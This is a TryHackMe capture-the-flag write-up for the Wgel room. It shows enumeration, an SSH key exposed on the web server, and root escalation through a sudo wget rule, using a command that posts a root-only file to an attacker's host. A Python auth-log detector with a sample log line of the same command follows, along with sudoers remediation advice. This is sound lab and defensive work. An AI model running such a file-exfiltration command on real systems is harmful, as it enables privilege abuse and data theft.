# Wgel CTF

{% embed url="<https://tryhackme.com/room/wgelctf>" %}

## Enumeration

### nmap

```text
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 61 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 94:96:1b:66:80:1b:76:48:68:2d:14:b5:9a:01:aa:aa (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCpgV7/18RfM9BJUBOcZI/eIARrxAgEeD062pw9L24Ulo5LbBeuFIv7hfRWE/kWUWdqHf082nfWKImTAHVMCeJudQbKtL1SBJYwdNo6QCQyHkHXslVb9CV1Ck3wgcje8zLbrml7OYpwBlumLVo2StfonQUKjfsKHhR+idd3/P5V3abActQLU8zB0a4m3TbsrZ9Hhs/QIjgsEdPsQEjCzvPHhTQCEywIpd/GGDXqfNPB0Yl/dQghTALyvf71EtmaX/fsPYTiCGDQAOYy3RvOitHQCf4XVvqEsgzLnUbqISGugF8ajO5iiY2GiZUUWVn4MVV1jVhfQ0kC3ybNrQvaVcXd
|   256 18:f7:10:cc:5f:40:f6:cf:92:f8:69:16:e2:48:f4:38 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDCxodQaK+2npyk3RZ1Z6S88i6lZp2kVWS6/f955mcgkYRrV1IMAVQ+jRd5sOKvoK8rflUPajKc9vY5Yhk2mPj8=
|   256 b9:0b:97:2e:45:9b:f3:2a:4b:11:c7:83:10:33:e0:ce (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJhXt+ZEjzJRbb2rVnXOzdp5kDKb11LfddnkcyURkYke
80/tcp open  http    syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
```

### Web page (port 80)

![image.png](/files/na9vUtI8KzYo0nTqbzk1)

It's just the default Apache page, so we run a directory search.

#### Directory search

<figure><img src="/files/ib9QgI03CpwW456DmPd1" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/NsqSVYl55eavmrC5J7Kc" alt=""><figcaption></figcaption></figure>

Only `sitemap` turned up here, so I ran another directory search against the `sitemap` subdirectory. It contains a `.ssh` directory, which is a huge find.

Now we need to know the username to log in with the private key (`id_rsa`) we got.

<figure><img src="/files/lq1kzYxaLHFwyJeX12x5" alt=""><figcaption></figcaption></figure>

### Obtaining username

What about the username? It’s in the source code of the main page: jessie.

<figure><img src="/files/2TWOA29JgvwOgyhnOBcK" alt=""><figcaption></figcaption></figure>

### root

The sudo list result shows that `wget` is open to everyone.

<figure><img src="/files/Iol4lAy7PTQKRRDLjLnl" alt=""><figcaption></figcaption></figure>

We can exploit this using the payload:

```bash
sudo /usr/bin/wget --post-file=/root/root_flag.txt <ip>:<port>
```

<figure><img src="/files/Zg8Inshyw7lIKIchzwgE" alt=""><figcaption></figcaption></figure>
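
The defender's view of this step, as an added example that is not part of the original walkthrough: it scans sudo's auth-log records for `wget` run through sudo and raises the severity when `--post-file` is used as root. The log lines are constructed, and the syslog layout, the host name `host` and the `192.0.2.10` address are assumptions.

```python
import os
import re

# Constructed sample of sudo records as they appear in /var/log/auth.log
# (assumed syslog layout; "host" and the 192.0.2.x address are placeholders).
SAMPLE_LOG = """\
Mar 10 12:00:01 host sudo:   jessie : TTY=pts/0 ; PWD=/home/jessie ; USER=root ; COMMAND=/usr/bin/wget --post-file=/root/root_flag.txt 192.0.2.10:8000
Mar 10 12:01:10 host sudo:   jessie : TTY=pts/0 ; PWD=/home/jessie ; USER=root ; COMMAND=/usr/bin/wget https://example.com/pkg.deb
Mar 10 12:02:30 host sudo:   jessie : command not allowed ; TTY=pts/0 ; PWD=/home/jessie ; USER=root ; COMMAND=/bin/cat /etc/shadow
Mar 10 12:03:00 host sshd[811]: Accepted publickey for jessie from 192.0.2.10 port 50000 ssh2
"""

# "<user> : [status ; ]TTY=... ; PWD=... ; USER=<runas> ; COMMAND=<cmd>"
SUDO_RE = re.compile(
    r"sudo(?:\[\d+\])?:\s+(?P<user>\S+) : (?P<status>.*?)TTY=.*? ; "
    r"USER=(?P<runas>\S+) ; COMMAND=(?P<cmd>.+)$"
)
# Matches both "--post-file=PATH" and "--post-file PATH"
POST_FILE_RE = re.compile(r"--post-file(?:=|\s+)(?P<path>\S+)")


def triage(line):
    """Return an alert dict for an allowed `sudo wget` record, else None."""
    m = SUDO_RE.search(line)
    if not m or m["status"]:  # not a command record, or sudo refused it
        return None
    if os.path.basename(m["cmd"].split()[0]) != "wget":
        return None
    post = POST_FILE_RE.search(m["cmd"])
    # wget reading a local file as root and sending it out is the risky case
    high = post is not None and m["runas"] == "root"
    return {
        "user": m["user"],
        "runas": m["runas"],
        "severity": "high" if high else "review",
        "file": post["path"] if post else None,
    }


def scan(log_text):
    """Triage every line of a log and keep only the alerts."""
    return [a for a in map(triage, log_text.splitlines()) if a]


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

The durable fix is on the sudoers side: remove the `wget` entry, since a rule that lets a user run it as root also lets them read root-only files.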

